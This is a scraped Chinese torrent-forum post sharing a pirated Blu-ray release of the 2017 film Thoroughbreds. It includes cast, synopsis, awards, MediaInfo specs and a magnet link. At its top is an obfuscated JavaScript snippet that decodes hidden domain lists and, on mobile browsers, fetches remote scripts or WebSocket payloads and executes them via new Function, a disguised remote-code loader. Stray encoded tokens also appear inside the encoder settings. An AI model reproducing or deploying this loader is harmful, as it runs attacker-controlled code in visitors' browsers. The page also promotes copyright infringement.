良种动物[双语字幕]Thoroughbreds.2017.1080p.BluRay.x264.DTS-迅雷下载 8.26GB

版主小s 26天前 238

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 良种动物 / 优良品种 / 纯种动物(台)

◎片 名 Thoroughbreds

◎年 代 2017

◎产 地 美国

◎类 别 剧情 / 惊悚

◎语 言 英语

◎上映日期 2017-01-21(圣丹斯电影节) / 2018-03-09(美国)

◎IMDb评分 6.7/10 from 31884 users

◎IMDb链接 https://www.imdb.com/title/tt5649108

◎豆瓣评分 6.3/10 from 2889 users

◎豆瓣链接 https://movie.douban.com/subject/26782004/

◎片 长 92分钟

◎导 演 科瑞·芬莱 Cory Finlay

◎编 剧 科瑞·芬莱 Cory Finlay

◎主 演 安雅·泰勒-乔伊 Anya Taylor-Joy

奥利维亚·库克 Olivia Cooke

安东·叶利钦 Anton Yelchin

保罗·斯帕克斯 Paul Sparks

弗朗西斯·斯威夫特 Francie Swift

凯丽·维诺夫 Kaili Vernoff

◎标 签 美国 | 惊悚 | 悬疑 | 剧情 | 2017 | 黑色幽默 | 独立 | AnyaTaylor-Joy

◎简 介

儿时玩伴Lily和Amanda在多年的分别后于康涅狄格郊区重聚,一位出落成光鲜亮丽的上流社会少女,一位则特立独行,变成社会边缘人士。尽管两人身份差异巨大,但由于Lily有一位暴虐的继父Mark,她们联手使出最有毁灭性的方法来对抗他,也因此雇佣了一位当地骗子来开展计划。

◎获奖情况

第33届圣丹斯电影节(2017)

观众奖 未来创新奖(提名) 科瑞·芬莱

第34届美国独立精神奖(2019)

最佳处女作剧本(提名) 科瑞·芬莱

第28届哥谭独立电影奖(2018)

最佳剧本(提名)

第39届伦敦影评人协会奖(2019)

年度英国/爱尔兰小演员(提名) 安雅·泰勒-乔伊

  1. General

  2. Unique ID : 96042346853410641091961226319601643684 (0x4841154ADA72906C7B41A85101C8B0A4)

  3. Complete name : Thoroughbreds.2017.1080p.BluRay.x264.DTS-PTH.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 8.26 GiB

  7. Duration : 1 h 32 min

  8. Overall bit rate : 12.8 Mb/s

  9. Encoded date : UTC 2021-07-06 13:46:18

  10. Writing application : mkvmerge v58.0.0 ('Supper's Ready') 64-bit

  11. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  12. Video

  13. ID : 1

  14. Format : AVC

  15. Format/Info : Advanced Video Codec

  16. Format profile : [email protected]

  17. Format settings : CABAC / 4 Ref Frames

  18. Format settings, CABAC : Yes

  19. Format settings, Reference frames : 4 frames

  20. Codec ID : V_MPEG4/ISO/AVC

  21. Duration : 1 h 32 min

  22. Bit rate : 11.3 Mb/s

  23. Width : 1 920 pixels

  24. Height : 808 pixels

  25. Display aspect ratio : 2.40:1

  26. Frame rate mode : Constant

  27. Frame rate : 23.976 (24000/1001/53354) FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 8 bits

  31. Scan type : Progressive

  32. Bits/(Pixel*Frame) : 0.303

  33. Stream size : 7.25 GiB (88%)

  34. Writing library : x264 core 164 r3065+55M 280faca t_mod_New [(8 & 10)[email protected] X86_64]

  35. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=24 / lookahead_threads=6 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=17.0000 / qcomp=0.70 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.90 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  36. Language : English

  37. Default : Yes

  38. Forced : No


  39. Audio

  40. ID : 2

  41. ID in the original source medium : 4352 (0x1100)

  42. Format : DTS

  43. Format/Info : Digital Theater Systems

  44. Codec ID : A_DTS

  45. Duration : 1 h 32 min

  46. Bit rate mode : Constant

  47. Bit rate : 1 509 kb/s

  48. Channel(s) : 6 channels

  49. Channel layout : C L R Ls Rs LFE

  50. Sampling rate : 48.0 kHz

  51. Frame rate : 93.750 FPS (512 SPF)

  52. Bit depth : 24 bits

  53. Compression mode : Lossy

  54. Stream size : 994 MiB (12%)

  55. Language : English

  56. Default : Yes

  57. Forced : No

  58. Original source medium : Blu-ray


  59. Text #1

  60. ID : 3

  61. ID in the original source medium : 4613 (0x1205)

  62. Format : PGS

  63. Muxing mode : zlib

  64. Codec ID : S_HDMV/PGS

  65. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  66. Duration : 1 h 23 min

  67. Bit rate : 42.0 kb/s

  68. Count of elements : 1796

  69. Stream size : 25.2 MiB (0%)

  70. Title : chs&eng

  71. Language : Chinese

  72. Default : Yes

  73. Forced : No

  74. Original source medium : Blu-ray


  75. Text #2

  76. ID : 4

  77. ID in the original source medium : 4614 (0x1206)

  78. Format : PGS

  79. Muxing mode : zlib

  80. Codec ID : S_HDMV/PGS

  81. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  82. Duration : 1 h 23 min

  83. Bit rate : 42.3 kb/s

  84. Count of elements : 1796

  85. Stream size : 25.4 MiB (0%)

  86. Title : cht&eng

  87. Language : Chinese

  88. Default : No

  89. Forced : No

  90. Original source medium : Blu-ray


  91. Text #3

  92. ID : 5

  93. ID in the original source medium : 4615 (0x1207)

  94. Format : PGS

  95. Muxing mode : zlib

  96. Codec ID : S_HDMV/PGS

  97. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  98. Duration : 1 h 23 min

  99. Bit rate : 23.5 kb/s

  100. Count of elements : 1796

  101. Stream size : 14.1 MiB (0%)

  102. Title : chs

  103. Language : Chinese

  104. Default : No

  105. Forced : No

  106. Original source medium : Blu-ray


  107. Text #4

  108. ID : 6

  109. ID in the original source medium : 4616 (0x1208)

  110. Format : PGS

  111. Muxing mode : zlib

  112. Codec ID : S_HDMV/PGS

  113. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  114. Duration : 1 h 23 min

  115. Bit rate : 23.8 kb/s

  116. Count of elements : 1796

  117. Stream size : 14.3 MiB (0%)

  118. Title : cht

  119. Language : Chinese

  120. Default : No

  121. Forced : No

  122. Original source medium : Blu-ray


  123. Text #5

  124. ID : 7

  125. ID in the original source medium : 4608 (0x1200)

  126. Format : PGS

  127. Muxing mode : zlib

  128. Codec ID : S_HDMV/PGS

  129. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  130. Duration : 1 h 26 min

  131. Bit rate : 34.2 kb/s

  132. Count of elements : 1942

  133. Stream size : 21.1 MiB (0%)

  134. Language : English

  135. Default : No

  136. Forced : No

  137. Original source medium : Blu-ray


  138. Menu

  139. 00:00:00.000 : Chapter 01

  140. 00:05:34.125 : Chapter 02

  141. 00:10:22.788 : Chapter 03

  142. 00:16:01.335 : Chapter 04

  143. 00:21:39.548 : Chapter 05

  144. 00:24:58.121 : Chapter 06

  145. 00:27:04.914 : Chapter 07

  146. 00:29:56.586 : Chapter 08

  147. 00:34:05.793 : Chapter 09

  148. 00:39:16.270 : Chapter 10

  149. 00:44:33.671 : Chapter 11

  150. 00:48:59.728 : Chapter 12

  151. 00:52:28.228 : Chapter 13

  152. 00:58:50.360 : Chapter 14

  153. 01:01:30.228 : Chapter 15

  154. 01:05:48.444 : Chapter 16

  155. 01:11:20.901 : Chapter 17

  156. 01:17:56.838 : Chapter 18

  157. 01:21:46.943 : Chapter 19

  158. 01:26:36.149 : Chapter 20



TAGS 剧情 惊悚

磁力链:
  • magnet:?xt=urn:btih:2593FE92463F4CBAFFD756A06EAE24DBB157BF3B
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回